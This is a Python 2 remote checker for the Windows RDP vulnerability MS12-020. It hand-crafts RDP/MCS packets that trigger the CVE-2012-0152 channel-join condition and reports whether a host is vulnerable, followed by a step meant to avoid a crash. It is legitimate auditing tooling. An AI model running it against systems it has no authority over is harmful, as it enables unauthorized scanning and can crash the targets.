
MS12-020 remote checker

  1. #!/usr/bin/env python
  2.  
  3. #
  4. # MS12-020 checker (no BSOD)
  5. #
  6. # Use DoS bug (CVE-2012-0152) for check
  7. #
  8. # Update: remove RDP negotiation to use standard RDP for Windows 7
  9. #
  10. # by Worawit Wang (sleepya)
  11. #
  12.  
  13. import sys
  14. import socket
  15. from struct import pack,unpack
  16.  
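# Target host is the single positional argument.  Without the guard a bare
# invocation dies with an IndexError traceback instead of a usage line.
if len(sys.argv) < 2:
        sys.stderr.write("usage: %s <host>\n" % sys.argv[0])
        sys.exit(1)
host = sys.argv[1]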
  18.  
def make_tpkt(data):
        """Prefix *data* with a 4-byte TPKT header (RFC 1006).

        The header is: version 3, reserved 0, then the total length
        (header + payload) as a big-endian 16-bit integer.
        """
        total_len = len(data) + 4
        header = pack("!BBH", 3, 0, total_len)
        return header + data
  21.  
def make_x224(type, data):
        """Build an X.224 TPDU: length indicator, TPDU code, then *data*.

        The length byte counts the code byte plus the payload, so the
        payload must be at most 254 bytes (pack raises struct.error otherwise).
        """
        li = 1 + len(data)
        return pack("!BB", li, type) + data
  24.  
  25.  
# One TCP connection to the RDP port.  settimeout(10) covers connect() and
# every recv() below; nothing is wrapped in try/except, so a refused
# connection or 10 s of silence ends the script with a traceback rather
# than a message.
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(10)
sk.connect((host,3389))

# craft connection request
# x224 type 0xe0
# - dst_ref, src_ref, class_opts, data
x224_1 = make_x224(0xe0, pack("!HHB", 0, 0, 0))
sk.send(make_tpkt(x224_1))
data = sk.recv(8192)
# Proceed only on this exact 11-byte reply: TPKT header (03 00 00 0b) then an
# X.224 TPDU of type 0xd0 (Connection Confirm to the 0xe0 request above).
# The comparison is against a str literal: this file is Python 2 (print
# statements), where recv() returns str.  Under Python 3 recv() returns
# bytes, which never equals a str, so the script would always print
# "Cannot check" here.
if data != "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00":
        print "Cannot check"
        sys.exit()  # socket is not closed explicitly on this path

# x224 type 0xf0 (Data TPDU)
# - EOT (0x80)
x224_2 = make_x224(0xf0, pack("!B", 0x80))

# craft connect-initial with gcc
# Each field below is a BER INTEGER (tag 0x02, length, value); the three
# parameter sets are wrapped in SEQUENCE (0x30) by mcs_data.
target_params = (""
        + "\x02\x01\x22" # maxChannelIds
        + "\x02\x01\x20" # maxUserIds
        + "\x02\x01\x00" # maxTokenIds
        + "\x02\x01\x01" # numPriorities
        + "\x02\x01\x00" # minThroughput
        + "\x02\x01\x01" # maxHeight
        + "\x02\x02\xff\xff" # maxMCSPDUSize
        + "\x02\x01\x02" # protocolVersion
)
min_params = (""
        + "\x02\x01\x01" # maxChannelIds
        + "\x02\x01\x01" # maxUserIds
        + "\x02\x01\x01" # maxTokenIds
        + "\x02\x01\x01" # numPriorities
        + "\x02\x01\x00" # minThroughput
        + "\x02\x01\x01" # maxHeight
        + "\x02\x01\xff" # maxMCSPDUSize
        + "\x02\x01\x02" # protocolVersion
)
max_params = (""
        + "\x02\x01\xff" # maxChannelIds
        + "\x02\x01\xff" # maxUserIds
        + "\x02\x01\xff" # maxTokenIds
        + "\x02\x01\x01" # numPriorities
        + "\x02\x01\x00" # minThroughput
        + "\x02\x01\x01" # maxHeight
        + "\x02\x02\xff\xff" # maxMCSPDUSize
        + "\x02\x01\x02" # protocolVersion
)
mcs_data = (""
        + "\x04\x01\x01" # callingDomainSelector
        + "\x04\x01\x01" # calledDomainSelector
        + "\x01\x01\xff" # upwardFlag
        + "\x30" + pack("B", len(target_params)) + target_params
        + "\x30" + pack("B", len(min_params)) + min_params
        + "\x30" + pack("B", len(max_params)) + max_params
        + "\x04\x00" # userData
)

# \x7f\x65  BER: APPLICATION 101 = Connect-Initial (MCS_TYPE_CONNECTINITIAL)
# Single-byte BER length: mcs_data must stay under 128 bytes for this to
# encode correctly (pack("!B") only rejects values above 255).
mcs = "\x7f\x65" + pack("!B", len(mcs_data))
sk.send(make_tpkt(x224_2 + mcs + mcs_data))
# No reply is read for Connect-Initial; the next recv() is assumed to return
# the attach-user response.  NOTE(review): if the server answers
# Connect-Initial, that reply may be what data[9:11] below is parsed from —
# confirm against a capture.

# craft attach user request
sk.send(make_tpkt(x224_2 + "\x28"))
data = sk.recv(8192)
# 16-bit user id at offset 9 of the reply; a reply shorter than 11 bytes
# makes unpack raise struct.error.
user1 = unpack("!H", data[9:11])[0]

# Second attach-user, so two ids are held on the same connection.
sk.send(make_tpkt(x224_2 + "\x28"))
data = sk.recv(8192)
user2 = unpack("!H", data[9:11])[0]

# craft channel join request
# Join as user1 to channel user2+1001; per the file header this is the
# CVE-2012-0152 condition the check keys on.
sk.send(make_tpkt(x224_2 + "\x38" + pack("!HH", user1, user2+1001)))
data = sk.recv(8192)
# Bytes 7..8 of the reply are the author's unpatched signature; same
# str-vs-bytes caveat as the Connection Confirm comparison above.
if data[7:9] == "\x3e\x00":
        print "!!! VULN !!!"
        # below for safety from BSOD
        # Author's note: this second join (as user2) and its reply must
        # happen before the socket is closed — keep the order as is.
        sk.send(make_tpkt(x224_2 + "\x38" + pack("!HH", user2, user2+1001)))
        data = sk.recv(8192)
else:
        print "patched"

sk.close()